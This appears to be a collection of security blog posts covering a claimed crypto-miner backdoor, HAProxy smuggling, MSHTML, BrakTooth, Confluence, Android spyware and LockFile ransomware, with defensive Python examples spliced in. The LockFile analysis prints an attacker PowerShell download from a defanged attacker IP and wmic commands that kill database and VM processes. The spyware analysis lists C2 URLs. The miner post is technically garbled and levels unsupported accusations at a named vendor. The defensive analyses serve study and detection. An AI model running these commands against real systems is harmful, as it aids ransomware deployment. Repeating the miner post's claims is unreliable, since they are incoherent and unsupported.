Are Bitcoin miners really malware for dark web?

- Posted in Exploit by

With the loss of business due to Covid-19, cryptocurrency has had a resurgence in uptake. Offers of better mining, and of group mining from legitimate organizations, have seen small businesses jump on the opportunity to increase revenue through currency mining. Unfortunately, this has also seen an increase in exploit activity through the mining software.

History to new activity

In the past the threat was confined to crypto hijacking: sending a malware application to an unsuspecting user and then installing, without the user's knowledge, an application that would start mining, commonly called cryptojacking. This prompted increases in malware protection and protection policies, which saw the problem move to more sophisticated means such as social engineering.

However, with the increase in unemployed workers and business losses due to Covid-19, personal computers started to be assigned to the task of crypto mining to try and get people out of difficult spots. This increase in activity did not go unnoticed, and dark web actors turned their minds to exploiting these new users through their own uptake of mining software. This was great news for the hackers, as they no longer needed to force the malware or exploits onto users, who voluntarily downloaded it through legitimate actors.

Industry Knowledge

Before I explain how it works, it is important to note that the exploit being deployed is known in the core code, and it appears that it has been left unfixed because it allows Bitcoin to increase profits, or so some of the actors who exploit the code explain. They claim that they do this to raise awareness, as Bitcoin is ignoring their statements about how it exists and what it does.

The exploit

So how does it work? It's very simple really. A user engaging in mining signs up to a group management site and downloads a mining application so that they can mine cryptocurrency in the group, or cloud pool, which is a pool they build from the machines they have, their friends' machines and so on (cudominer is one example). The installed mining application reports to the server and starts the mining process for the group based on the parameters and hardware set in the management site. Simple so far: the miner then goes off and starts mining, and the user can see the hashes being generated and the approximate Bitcoin currency they should earn in the month.

The exploit works in a two-fold manner. First, it allows the dark web to see your miner's IP and add it to the botnet network. An attacker can then inject a set of code to exploit your machine to process mining for other users who are not in your group, which is reported as your group in the form of a fee that is then recorded to Bitcoin as a legitimate fee. This fee is delivered to the botnet manager application, available for purchase on the dark web, by the actor setting up the exploit.

Exploit purchase

The second issue relates to the code continuing even after closing the application. A user may close the miner and think, right, now I can do something else, and leave it be. Unknown to the user, the miner may be turned on remotely by the exploiter and grab Bitcoin from your machine/pool, and you will never know, as it stays under the radar by not using 100% of the processor; it only becomes noticeable when using another application that needs high resources, such as gaming, as it begins to slow down or periodically freeze. It is harder to notice on higher-end gaming hardware, because resources are allocated to the calculations so quickly that it appears as latency rather than CPU/GPU load. What's worse, you pay the power bill and they get 100% of the unseen transactions. The management software never sees it occurring, but the Bitcoin is credited to the exploited application and sent to the actor exploiting the flaw, which is accounted for through Bitcoin as legitimate due to the setup of the pool design.

The software is successful because you, the installer, have approved it to bypass your defenses (Windows Defender etc.) at install, as it reports legitimately as a signed MS application from a legitimate company, which is also likely to be unaware of the exploit, as it is part of the core code working as intended.

Testing

We actively tested the issue above after discovering websites on the dark web that advertised the exploits for use.

In our tests we saw the following:

  1. Active exploit to a large pool of devices that allowed for the collection of 2.5 Bitcoin, undermining the value of Bitcoin currency.
  2. Active exploit of the miner application in Windows 10 that could not be closed in the Task Manager.
  3. On reboot, the exploited miners became active again, meaning the miner code had been lodged into the startup code of the OS.

We also have additional concerns as to whether this exploit could be used for other malicious purposes.

We notified cudominer of our discovery, with no response, and we have confirmed that the calculations fall short of the sums we calculated for load and mining allocation compared to the reported sum in the cudominer manager.

Recommendations

Uninstall immediately.

To uninstall

  1. Reconfigure your miner's default setting manually by disconnecting from the pool default, and disable startup. Check that the miner manager is disabled in the Startup tab under Task Manager. Then uninstall the software and check to confirm that the antimalware settings have been removed. Reboot and test again.
  2. Resetting the antimalware back to default is also recommended; it is easier to re-approve apps than to have the exploit active.

If you must run

If you must run the code, and we understand why you might need to, place the code on a computer that only runs this code, and make sure it is firewalled from your main network. When you have finished the mining for the period you allocated, physically shut down and turn off the machine until you need it next.

Remember that the code exploit sends money to the botnet for any form of criminal activity, and to date Anon has advised that over 100 million in Bitcoin has been generated, so running these miner managers is not recommended until this exploit is fixed.

HAProxy Integer overflow exploit

- Posted in Vulnerability by

HAProxy is a free-to-use server load balancing application or software add-on. JFrog Security reported on September 7, 2021 that an integer overflow vulnerability existed in versions 2.0 through 2.5 in the htx_add_header() and htx_add_trailer() functions, due to a missing length check on the header name, that makes it possible for an attacker to bypass all configured http-request HAProxy ACLs, and possibly other ACLs, to conduct an HTTP Request Smuggling attack. This attack allows an adversary to “smuggle” HTTP requests to the backend server without the proxy server being aware of it.

HA Proxy exploit

The smuggled requests have various impacts, depending on HAProxy’s configuration and the backend web server configuration. It is reported that exploitation of the vulnerability can or may:

  • Bypass security controls, including any ACLs defined in HAProxy
  • Gain unauthorized access to sensitive data
  • Execute unauthorized commands or modify data
  • Hijack user sessions
  • Exploit a reflected XSS vulnerability without user interaction

HTTP Request Smuggling is based on interfering with the processing of HTTP requests between the frontend (i.e. HAProxy on a router) and the backend (the server hosting the destination). An attacker typically exploits this technique by sending a specially crafted request that includes an additional request in its body. During a successful attack, the inner request is smuggled through the frontend, which treats it as nothing more than the outer request’s body; in fact it is an additional request, hidden from the HAProxy frontend, that the backend executes as a normal request.

In most cases, the smuggling technique works by supplying both the Content-Length and Transfer-Encoding headers with contradicting lengths in the same request and aiming for parsing inconsistencies between the frontend and backend servers. In the original authors’ case, however, the attack was made possible by an integer overflow vulnerability that allowed reaching an unexpected state in HAProxy while parsing an HTTP request, specifically in the logic that deals with Content-Length headers.

An important enabling condition that makes this class of attacks possible is that when the frontend server forwards HTTP requests to the backend, it reuses the same established TCP connection instead of spending time opening and closing sockets. The requests are sent "back to back", and it is up to the backend server to decide where one request ends and the next one begins.
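The two paragraphs above describe the conditions a frontend must refuse to pass along: competing body delimiters, and header names or values whose length is never checked (the class of check the HAProxy fix adds). The following is an added example, not JFrog's research code and not HAProxy's source; it is a small request-head auditor in Python with size limits (MAX_NAME_LEN, MAX_VALUE_LEN) that are assumptions chosen for illustration, run over constructed sample requests rather than captured traffic.

```python
import re
from dataclasses import dataclass, field
from typing import List

# Size limits are assumptions chosen for this example, not HAProxy's real tunables;
# the point is that every header name and value length is checked before use.
MAX_NAME_LEN = 256
MAX_VALUE_LEN = 4096

# RFC 7230 token characters allowed in a header name.
TOKEN = re.compile(rb"[!#$%&'*+.^_`|~0-9A-Za-z-]+")


@dataclass
class Verdict:
    accepted: bool
    reasons: List[str] = field(default_factory=list)


def audit_request_head(raw: bytes) -> Verdict:
    """Check the head of a raw HTTP/1.1 request for the conditions that let a
    frontend and a backend disagree about where the body ends."""
    reasons: List[str] = []
    head, sep, _body = raw.partition(b"\r\n\r\n")
    if not sep:
        return Verdict(False, ["no end-of-headers marker"])
    lines = head.split(b"\r\n")
    if not re.fullmatch(rb"[A-Z]+ \S+ HTTP/1\.[01]", lines[0]):
        reasons.append("malformed request line")
    content_lengths, transfer_encodings = [], []
    for line in lines[1:]:
        name, colon, value = line.partition(b":")
        if not colon:
            reasons.append("header line without a colon")
            continue
        value = value.strip()
        # Explicit length checks on both name and value before anything else uses them.
        if len(name) > MAX_NAME_LEN:
            reasons.append(f"header name too long ({len(name)} bytes)")
        if len(value) > MAX_VALUE_LEN:
            reasons.append(f"header value too long ({len(value)} bytes)")
        if not TOKEN.fullmatch(name):
            reasons.append("illegal characters in header name")
        lowered = name.lower()
        if lowered == b"content-length":
            content_lengths.append(value)
        elif lowered == b"transfer-encoding":
            transfer_encodings.append(value)
    # The classic smuggling setup: two competing body delimiters in one request.
    if content_lengths and transfer_encodings:
        reasons.append("both Content-Length and Transfer-Encoding present")
    if len(set(content_lengths)) > 1:
        reasons.append("conflicting Content-Length values")
    for cl in content_lengths:
        # Plain decimal only, and short enough never to overflow a 64-bit length.
        if not re.fullmatch(rb"[0-9]{1,18}", cl):
            reasons.append("Content-Length is not a plain decimal number")
    return Verdict(not reasons, reasons)


# Constructed sample requests for demonstration; they are not captured traffic.
CLEAN_REQUEST = (b"POST /api HTTP/1.1\r\nHost: example.test\r\n"
                 b"Content-Length: 5\r\n\r\nhello")
DUAL_DELIMITER_REQUEST = (b"POST /api HTTP/1.1\r\nHost: example.test\r\n"
                          b"Content-Length: 5\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\n")
OVERLONG_NAME_REQUEST = b"GET / HTTP/1.1\r\n" + b"X" * 300 + b": 1\r\n\r\n"

if __name__ == "__main__":
    for label, req in [("clean", CLEAN_REQUEST),
                       ("dual delimiter", DUAL_DELIMITER_REQUEST),
                       ("overlong name", OVERLONG_NAME_REQUEST)]:
        print(label, audit_request_head(req))
```

Rejecting rather than "repairing" a request that carries both delimiters is the safe choice: any attempt to normalise it means the frontend is again guessing what the backend will do.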

In our testing, the attack can be mitigated if the parsed request then reaches a properly configured server. However, where the backend is a direct connection, i.e. no properly configured Apache or NGINX in front of it but a Microsoft server port exposed directly, the execution is still possible.

As advised by HAProxy, the best solution is to upgrade to version 2.0.25, 2.2.17, 2.3.14 or 2.4.4 (the fix for CVE-2021-40346), which adds size checks for the header name and value lengths.

However, for security reasons HTTP traffic should by default be redirected to HTTPS, even if that has to be done on the end server. This redirect will help remove the hidden execution where the patch above cannot be applied.

Recommendations

If HAProxy cannot be immediately upgraded, HAProxy should have an HTTPS redirect rule ("redirect scheme https") added for port 80, or, in the alternative, the end server (Apache or NGINX) should redirect to HTTPS.

Where HAProxy cannot be upgraded at all, and an HTTPS redirect is also not possible (due to, say, vendor firmware), the end server should be removed from HAProxy and the port dedicated in its connection to the end server until the hardware containing the firmware can be replaced, even if this means redirecting web clients.

Office 365/2019 MSHTML Vulnerability

- Posted in Vulnerability by

An organization named EXPMON discovered an Office 365/2019 vulnerability on September 5th 2021. The vulnerability lies within MSHTML, the Microsoft Internet Explorer browser engine. The vulnerability itself allows a remote code execution (RCE) attack, letting the attacker remotely install malware on the target machine.

Source tweet

The exploit is performed by an attacker sending a user a modified .docx file. The file contains a script that runs upon opening the document and uses the IE MSHTML engine to open the URL programmed into the scripting in the .docx file.
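A .docx is a zip package, and every part that can reach out to a URL has to declare that target in a relationships (.rels) part. A mail gateway or triage script can therefore list the remote targets a document would open before anyone double-clicks it. The following is an added example written for this post, not EXPMON's or Microsoft's code: a Python scanner that flags any relationship marked External whose target uses a remote scheme, plus a helper that constructs a minimal package for the demo (the URL remote.example.test is a placeholder, not an indicator from the post). The set of schemes flagged, including the mhtml scheme that the MSHTML engine handles, is an assumption of this example.

```python
import io
import xml.etree.ElementTree as ET
import zipfile
from typing import List, Optional, Tuple
from urllib.parse import urlsplit

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
# Schemes that make a relationship fetch remote content; "mhtml" is a scheme
# handled by the MSHTML engine the post describes. Extend to taste.
REMOTE_SCHEMES = {"http", "https", "ftp", "mhtml"}


def external_targets(docx_bytes: bytes) -> List[Tuple[str, str]]:
    """Return (part name, target) for every relationship in the package that is
    marked External and points at a remote URL, for a reviewer to triage."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as package:
        for part in package.namelist():
            if not part.endswith(".rels"):
                continue  # only relationship parts declare targets
            root = ET.fromstring(package.read(part))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal").lower() != "external":
                    continue
                target = rel.get("Target", "")
                if urlsplit(target).scheme.lower() in REMOTE_SCHEMES:
                    hits.append((part, target))
    return hits


def build_sample_docx(external_target: Optional[str]) -> bytes:
    """Construct a minimal OOXML-style package for the demo (not a real document).
    With external_target=None the package only carries an internal relationship."""
    rels = ['<Relationship Id="rId1" Target="styles.xml" '
            'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles"/>']
    if external_target is not None:
        rels.append(f'<Relationship Id="rId2" Target="{external_target}" TargetMode="External" '
                    'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"/>')
    rels_xml = ('<?xml version="1.0" encoding="UTF-8"?>'
                f'<Relationships xmlns="{REL_NS}">{"".join(rels)}</Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as package:
        package.writestr("word/document.xml", "<document/>")
        package.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


if __name__ == "__main__":
    # Constructed placeholder URL, not an indicator from the post.
    suspicious = build_sample_docx("http://remote.example.test/page.html")
    print("flagged:", external_targets(suspicious))
    print("clean:", external_targets(build_sample_docx(None)))
```

Ordinary hyperlinks are also External relationships, so in production the relationship Type should be fed into the decision (an oleObject or frame pointing at a remote URL is far rarer in legitimate mail than a hyperlink); the scanner above reports every remote target so that rule can be layered on top.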

Microsoft has recommended disabling scripts and ActiveX execution, but we are not convinced this is enough, due to the base IE11 code being left in the OS. Although Microsoft did not carry over the IE code from legacy Edge when they switched to the new Chromium-based Edge browser, having legacy IE11 code within the OS still makes execution possible, and we recommend removing the base IE11. This is, however, not a guarantee, as Microsoft has not confirmed whether IE11 code exists in other parts of the OS, so the following prevention recommendations should always be followed:

Recommendation

Internet Explorer 11, even if not showing on your computer, is likely still installed as a background app on your machine, as Microsoft has maintained it for compatibility; it is recommended to remove it. You can do this by searching for Windows Features in the Windows search bar. Uncheck the Internet Explorer 11 checkbox to remove "Internet Explorer" and the IE11 code. Your PC should request a reboot; click reboot when prompted.

See walkthrough video here

If your business still requires use of Internet Explorer 11 for any reason, contact the developer of the program you are using to ask them to update their codebase to support modern web browsing.

It is important to remember that attachments are often insecure, and even if you have removed the above code, we continue to recommend not opening attachments unless you are absolutely sure of the source, and even then only once you have confirmed that the source did send it.

The preferred approach is to use a sharing system, such as our On The Move server https://c-justice.com/odrsoftware.html (available to all types of business) as one example, or another secure option, instead of using attachments.

BRAKTOOTH: Causing Havoc on Bluetooth Link Manager

- Posted in Vulnerability by

Bluetooth Classic (BT) protocol is a widely used wireless protocol in laptops, handheld devices, and audio devices. In the past few years, Bluetooth has come under scrutiny due to the discovery of several critical vulnerabilities. In this report, the authors disclose BrakTooth, a family of new security vulnerabilities in commercial BT stacks that range from denial of service (DoS) via firmware crashes and deadlocks in commodity hardware to arbitrary code execution (ACE) in certain IoTs.

As of the report date, 16 different vulnerabilities that impact billions of devices relying on Bluetooth Classic (BT) for communication have been uncovered. According to an academic paper from the University of Singapore, the bugs are found in the closed commercial BT stacks used by at least 1,400 embedded chip components, and can lead to a host of attack types, mainly denial of service (DoS) via firmware crashes (the term “brak” is actually Norwegian for “crash”). One of the bugs can also lead to arbitrary code execution (ACE).

The team analyzed 13 pieces of BT hardware from 11 vendors; so far, there have been 20 CVEs assigned across them; with four vulnerabilities pending CVE assignments from Intel and Qualcomm. Some of the bugs are patched, others are in the process of being patched; but, researchers said in the paper, “it is highly probable that many other products (beyond the ≈1400 entries observed in Bluetooth listing) are affected by BrakTooth,” including BT system-on-chips (SoCs), BT modules or additional BT end products.

Potentially, billions of devices could be affected worldwide.

BrakTooth report by Asset Group

Illustration of BT connection process

Figure 1: An Illustration of the BT connection procedure. FHS stands for Frequency Hopping Synchronization, ID stands for Identity, LMP stands for Link Manager Protocol and ACL stands for Asynchronous Connection Less.

Poc setup

Figure 2: An Illustration of BrakTooth attack scenario

Figure 2 showcases the generic scenario in which BrakTooth attacks are performed. The attacker only requires (1) a cheap ESP32 development kit (ESP-WROVER-KIT [37]) with a custom (non-compliant) LMP firmware and (2) a PC to run the PoC tool. The PoC tool communicates with the ESP32 board via serial port (/dev/ttyUSB1) and launches the attacks according to the specified target BDAddress () and exploit name parameter ().

Furthermore, the PoC tool logs over-the-air (OTA) packets and checks the health of the target by getting a paging timeout (no response) or alternatively getting status directly from the target via a serial port, ssh connection, etc.

Researchers successfully forced ESP32 into erasing data housed in devices’ non-volatile random-access memory (NVRAM), which retains data without applied power. They were also able to disable both BT and Wi-Fi on the device; and most concerningly, control the general-purpose input/output (GPIO) of the device if the attacker knows addresses to attached functions-controlling actuators. GPIO is used to communicate the ON/OFF signals received from connected switches, or the digital readings received from connected sensors, to the CPU.

“This has serious implications if such an attack is applied to Bluetooth-enabled smart home products,” the researchers warned.

Second form of attack - Laptops and devices

The second attack scenario can lead to DoS in laptops and smartphones. Researchers were able to achieve this using gear containing Intel AX200 SoCs and Qualcomm WCN3990 SoCs.

One of the DoS bugs (CVE-2021-34147) exists because of a failure in the SoC to free resources upon receiving an invalid LMP_timing_accuracy_response from a connected BT device (i.e., a “slave”, according to the paper):

“The attacker can exhaust the SoC by (a) paging, (b) sending the malformed packet, and (c) disconnecting without sending LMP_detach,” researchers wrote. “These steps are repeated with a different BT address (i.e., BDAddress) until the SoC is exhausted from accepting new connections. On exhaustion, the SoC fails to recover itself and disrupts current active connections, triggering firmware crashes sporadically.”

The researchers were able to forcibly disconnect slave BT devices from Windows and Linux laptops, and cause BT headset disruptions on Pocophone F1 and Oppo Reno 5G smartphones.

A third possible attack - Audio attacks

A third attack scenario was discovered while probing various BT speakers (specifically the Mi Portable Bluetooth Speaker MDZ-36-DB, BT headphones and BT audio modules) and an unbranded BT audio receiver.

They are all variously subject to a series of bugs (CVE-2021-31609 and CVE-2021-31612, failures when sending oversized LMP packets; CVE-2021-31613, truncated packets; CVE-2021-31611, starting procedures out of order; and CVE-2021-28135, CVE-2021-28155 and CVE-2021-31717, feature response flooding).

Successful exploits can “freeze” devices, requiring the user to manually turn on unresponsive devices afterwards. For the Xiaomi MDZ-36-DBs and JBL TUNE 500BTs, this can be done while the user is actively playing music, researchers noted.

“Although issues were found in SoCs targeted to audio products, the BT implementation can be reused in a number of SoCs destined to different BT products,” they added.

These are just a few of the possible exploit scenarios.

Confluence attack wave affects Jenkins

- Posted in Vulnerability by

In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.
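The four affected ranges above are easy to get wrong in a fleet inventory script, because "before 7.4.11" and "from 7.5.0" are open and closed bounds respectively and plain string comparison puts 7.4.9 after 7.4.11. The following is an added example for this post, not Atlassian's tooling: a Python check that parses a Confluence version string into a numeric tuple and tests it against the ranges exactly as the advisory states them.

```python
import re
from typing import Tuple

Version = Tuple[int, int, int]

# Affected ranges as stated in the advisory text above, as [lower, upper) pairs;
# the first range has no lower bound, so it starts at 0.0.0.
AFFECTED_RANGES = [
    ((0, 0, 0), (6, 13, 23)),
    ((6, 14, 0), (7, 4, 11)),
    ((7, 5, 0), (7, 11, 6)),
    ((7, 12, 0), (7, 12, 5)),
]


def parse_version(text: str) -> Version:
    """Parse 'major.minor.patch' (a missing component counts as 0) into a tuple that
    compares numerically, so 7.4.11 sorts after 7.4.9 as it should."""
    match = re.fullmatch(r"\s*(\d+)(?:\.(\d+))?(?:\.(\d+))?\s*", text)
    if not match:
        raise ValueError(f"not a version string: {text!r}")
    major, minor, patch = (int(part or 0) for part in match.groups())
    return (major, minor, patch)


def is_affected(version_text: str) -> bool:
    """True if the given Confluence Server/Data Center version falls inside one of
    the affected ranges for CVE-2021-26084; fixed versions and later are False."""
    version = parse_version(version_text)
    return any(lower <= version < upper for lower, upper in AFFECTED_RANGES)


if __name__ == "__main__":
    # Constructed sample versions, not an inventory of real hosts.
    for v in ["6.13.22", "6.13.23", "7.4.10", "7.4.11", "7.12.4", "7.13.0"]:
        print(v, "affected" if is_affected(v) else "not affected")
```

Note that a version such as 7.4.12 is not in any range: it sits on a branch that already contains the fix, which the closed-interval arithmetic captures without a special case.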

CVE-2021-26084 Detail

The attack has been reported to have affected Jenkins. The developers of the Jenkins server, one of the most widely used open-source automation systems, said they suffered a security breach after hackers gained access to one of their internal servers built on Confluence and deployed a cryptocurrency miner.

The Jenkins breach is part of a recent wave of attacks exploiting CVE-2021-26084 (also nicknamed Confluenza), an authentication bypass and command injection bug in Atlassian’s Confluence server which is reported as an OGNL injection vulnerability that allows an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance.

This vulnerability is being actively exploited in the wild. Affected servers should be patched immediately.

Atlassian workgroup discussion

The issue was discovered by Benny Jacob (SnowyOwl) via the Atlassian public bug bounty program.

It has been listed as a low priority at Atlassian despite it being reported to have a critical severity.

Spyware Variant Disguised As Korean Video App Targets Multiple Asian Countries

- Posted in Spyware by

A mobile app targeting both iOS and Android users primarily from China, Korea, and Japan was first identified by Lookout Threat Intelligence team in December 2020. The apps conduct spyware activities by offering escort services while they steal personal information from the victim’s device. The goal of the attackers behind this data exfiltration of personal information is extortion or blackmail. 

This particular type of scam is commonly called “Sextortion” and it typically targets multiple countries. These applications are often disguised as messaging, camera, and utility apps and are designed to exfiltrate data such as: 

  • Contacts
  • SMS data
  • Location information
  • Images from device storage

Technical Analysis 

During our routine threat hunting exercise, Cyble Research Labs came across a Twitter post that mentioned spyware masquerading as a Korean video app named “동영상”.

Researchers at Cyble downloaded the malware samples and performed a detailed analysis, based on which, we determined that the malware is a variant of spyware and uploads the victim data to a Command & Control (C2) server. 

APK Metadata Information 

  • App Name: 동영상 
  • Package Name: org.nnnmbook.sytyd 
  • SHA256 Hash: 0bda73046fd733164877071d11318ec6dd56a6ea4e773c70ed5a3c8f7a244478 

Figure 1 represents the metadata information of the application.


The malware has a set of permissions, out of which the attackers leverage three permissions to collect contacts, SMSs, and the victim’s location. These dangerous permissions are listed in Table 1. 

Permission        Description
INTERNET          Allows applications to open network sockets
READ_PHONE_STATE  Read-only access to phone state
READ_CONTACTS     Access to phone contacts

Table 1 Permission used for malicious activity

Upon running the app in a simulator, the researchers observed that it initially requests permission to read contacts. Once the app has this permission, it loads the app’s main activity, as shown in Figure 2.

Figure 2 App Flow

The app uses the permissions granted by the users to perform these activities on the users’ devices:  

  • The app reads the contacts from the compromised device and stores them in the array list

Reads and Collects Contacts

  • Collected contacts are stored in a JSON file and are uploaded to a C2 link, as shown in the figure below.

Upload to C2 Link

  • The application also has a code function to read and collect SMS data from the compromised device.

Read and collect messages

  • As shown in Figure 6, the collected SMS details are stored in a JSON file and are uploaded to the C2 link as represented below.

Upload to C2 Link

  • After calling the functions that send the collected contacts and messages to the C2 link, the app calls a further function that performs additional activities, such as collecting albums and device details.

Sensitive Info collected

The app synchronizes the user’s device data with the C2 login page used by the attacker to fetch the stored sensitive information.

Information to C2 Link

Conclusion  

Despite having been around for a long time, spyware still poses a significant threat as the Threat Actors responsible are constantly adapting and using various encryption techniques to avoid detection. This makes the removal of spyware nearly impossible. Thus, users should exercise caution while installing applications.

SAFETY RECOMMENDATIONS: 

  • Keep your anti-virus software updated to detect and remove malicious software. 
  • Verify the publisher before installing the app. Go to the actual company's website for the app you want, and confirm the app's information and details before installing.
  • Uninstall the application if you find this malware on your device. 
  • Keep your system and applications updated to the latest versions. 
  • Use strong passwords and enable two-factor authentication. 
  • Download and install software only from trusted sites and official app stores. 
  • Verify the privileges and permissions requested by apps before granting them access. 

MITRE ATT&CK® Techniques- for Mobile 

Tactic                        Technique ID   Technique Name
Defense Evasion               T1406          Obfuscated Files or Information
Credential Access/Collection  T1412          Capture SMS Messages
Discovery                     T1421          System Network Connections Discovery
Discovery                     T1426          System Information Discovery
Collection                    T1432          Access Contact List
Collection                    T1507          Network Information Discovery
Impact                        T1447          Delete Device Data

Indicators of Compromise (IoCs):   

Indicator                                                          Indicator type     Description
0bda73046fd733164877071d11318ec6dd56a6ea4e773c70ed5a3c8f7a244478   SHA256 file hash   Analysed malicious file
hxxp://206.119.173[.]23:8080/m/uploadSms.htm                       URL                C2 link
hxxp://206.119.173[.]23:8080/m/sychonizeUser.htm                   URL                C2 link
hxxp://206.119.173[.]23:8080/m/openVip.htm                         URL                C2 link
hxxp://206.119.173[.]23:8080/m/login.htm                           URL                C2 link
hxxp://206.119.173[.]23:8080/m/uploadAlbum.htm                     URL                C2 link
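Indicator tables like the one above are published defanged (hxxp, [.]) so that nobody clicks them by accident, which means they have to be normalised before they can be matched against proxy logs or pushed to a blocklist. The following is an added example for this post, not Cyble's tooling: a Python routine that refangs the indicators, classifies each as a SHA256 hash or URL, and derives the set of hosts to block. The table rows in IOC_TABLE are the page's own indicators reused as sample input; the type detection is limited to the two kinds that appear here.

```python
import re
from collections import defaultdict
from typing import Dict, List, Set
from urllib.parse import urlsplit

SHA256 = re.compile(r"^[0-9a-fA-F]{64}$")


def refang(indicator: str) -> str:
    """Undo the common defanging conventions (hxxp/hxxps, [.] and [:]) so an
    indicator can be matched against logs or loaded into a blocklist."""
    fixed = re.sub(r"^hxxp", "http", indicator, flags=re.IGNORECASE)
    return fixed.replace("[.]", ".").replace("[:]", ":").replace("(.)", ".")


def classify(indicator: str) -> str:
    """Classify an indicator as 'sha256', 'url' or 'unknown' after refanging."""
    value = refang(indicator)
    if SHA256.match(value):
        return "sha256"
    if urlsplit(value).scheme.lower() in ("http", "https"):
        return "url"
    return "unknown"


def parse_ioc_table(text: str) -> Dict[str, List[str]]:
    """Parse whitespace-separated rows of 'indicator type description' (first row is
    the header) and group the refanged indicator values by detected type."""
    grouped: Dict[str, List[str]] = defaultdict(list)
    for line in text.strip().splitlines()[1:]:
        indicator = line.split()[0]
        grouped[classify(indicator)].append(refang(indicator))
    return dict(grouped)


def blocklist_hosts(iocs: Dict[str, List[str]]) -> Set[str]:
    """Collapse the URL indicators to the hosts a proxy or firewall should block."""
    return {urlsplit(url).hostname for url in iocs.get("url", [])}


# IoC rows copied from the table above (page data, reused here as sample input).
IOC_TABLE = """\
Indicator Indicator-type Description
0bda73046fd733164877071d11318ec6dd56a6ea4e773c70ed5a3c8f7a244478 SHA256 Analysed malicious file
hxxp://206.119.173[.]23:8080/m/uploadSms.htm URL C2 link
hxxp://206.119.173[.]23:8080/m/sychonizeUser.htm URL C2 link
hxxp://206.119.173[.]23:8080/m/openVip.htm URL C2 link
hxxp://206.119.173[.]23:8080/m/login.htm URL C2 link
hxxp://206.119.173[.]23:8080/m/uploadAlbum.htm URL C2 link
"""

if __name__ == "__main__":
    iocs = parse_ioc_table(IOC_TABLE)
    print("hashes:", iocs.get("sha256"))
    print("block hosts:", blocklist_hosts(iocs))
```

Keeping the refanged values in memory only, and writing blocklists rather than reports, avoids re-publishing live C2 URLs in a clickable form.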

LockFile Ransomware: Exploiting Microsoft Exchange Vulnerabilities Using ProxyShell

- Posted in Ransomware by

LockFile ransomware was first seen in July 2021 and has been highly active since then. It has global operations, and most of the victims are from the United States of America and Asia. The ransomware group hosts a website on the TOR network to guide victims to pay the ransom and subsequently get the instructions to decrypt their files. This webpage contains a uTox ID and an email address to contact the Threat Actor (TA), as shown in the figure below.

Darkweb Lockfile

Cyble researchers found a few details on the ransomware website indicating that the gang could also be related to other threat actors. For example, in the ATTENTION section of the website, the last line mentions a wallpaper being provided by LockBit, and the contact email contains a reference to Conti.

Recently the Threat Actor (TA) behind LockFile has started attacking Microsoft Exchange Servers using the ProxyShell attack. ProxyShell chains the Microsoft Exchange vulnerabilities listed below, resulting in unauthenticated code execution. Orange Tsai, a Principal Security Researcher from Devcore, recently discovered these vulnerabilities. The vulnerabilities are:

  • CVE-2021-34473 - Pre-auth Path Confusion leads to ACL Bypass (Patched in April by KB5001779)
  • CVE-2021-34523 - Elevation of Privilege on Exchange PowerShell Backend (Patched in April by KB5001779)
  • CVE-2021-31207 - Post-auth Arbitrary-File-Write leads to RCE (Patched in May by KB5003435)

According to a Symantec blog post, after successful exploitation, the TA uses the following PowerShell command:

powershell wget hxxp://209.14.0[.]234:46613/VcEtrKighyIFS5foGNXH

The PowerShell command in use is unknown, but on August 13, 2021, an independent security researcher captured the associated IP address (209.14.0[.]234). According to the researcher, attackers used this IP to exploit the ProxyShell vulnerability.

Researchers also found that 20 to 30 minutes before the deployment of the ransomware, the TA drops three files:

  • An exploit for the PetitPotam vulnerability (CVE-2021-36942), namely efspotato.exe.
  • Two files: active_desktop_render.dll and active_desktop_launcher.exe

The PetitPotam vulnerability allows the TA to compromise the Domain Controller, which results in the compromise of the complete Active Directory. The PetitPotam technique uses MS-EFSRPC (Microsoft’s Encrypting File System Remote Protocol), which is responsible for performing maintenance and management operations on encrypted data stored on a remote system.

As per Symantec, the executable active_desktop_launcher.exe is legitimate software, but active_desktop_render.dll is a malicious Dynamic Link Library (DLL). The active_desktop_render.dll is loaded using a DLL search order hijacking attack. After loading, the DLL drops and decrypts desktop.ini in a local directory. This desktop.ini then loads and executes shellcode, which in turn activates the efspotato.exe file that exploits the PetitPotam vulnerability.

Upon compromising the domain, the TA then deploys LockFile ransomware on various systems in the compromised domain.

Cyble Research found one of the LockFile malware samples on the surface web while conducting routine Open-Source Intelligence (OSINT) threat hunting exercises. The figure below shows the high-level execution flow of LockFile ransomware. The malware initially kills all known processes related to virtual machines, databases and other related services. Then it iterates through the system's drives to find logical drives on which to search for files and folders. For each file found, the malware checks the file extension and, if it matches a pre-defined extension, encrypts it. After completing the encryption process, it deletes itself.

Exchange execution

Technical Analysis

Their static analysis found that the malware is a Windows-based x64 console application written in C/C++ and compiled on 2021-07-03 18:15:34, as shown in the figure below.

Details of static analysis

As shown in the figure below, the malware creates several subprocesses to perform several activities upon execution.

Details of malware execution

The subprocesses kill the various running processes shown in Table 1. The malware uses the Windows Management Interface Command (WMIC) and supplies the process name as a wildcard between % characters to achieve this. WMIC is a simple command-prompt tool that returns information about the system it is run on.

The list of commands the malware executed is shown in the table below.

Command                                                                                    Target Process
C:\Windows\system32\cmd.exe /c wmic process where "name like '%vmwp%'" call terminate         vmwp
C:\Windows\system32\cmd.exe /c wmic process where "name like '%virtualbox%'" call terminate   virtualbox
C:\Windows\system32\cmd.exe /c wmic process where "name like '%vbox%'" call terminate         vbox
C:\Windows\system32\cmd.exe /c wmic process where "name like '%sqlservr%'" call terminate     sqlservr
C:\Windows\system32\cmd.exe /c wmic process where "name like '%mysqld%'" call terminate       mysqld
C:\Windows\system32\cmd.exe /c wmic process where "name like '%omtsreco%'" call terminate     omtsreco
C:\Windows\system32\cmd.exe /c wmic process where "name like '%oracle%'" call terminate       oracle
C:\Windows\system32\cmd.exe /c wmic process where "name like '%tnslsnr%'" call terminate      tnslsnr
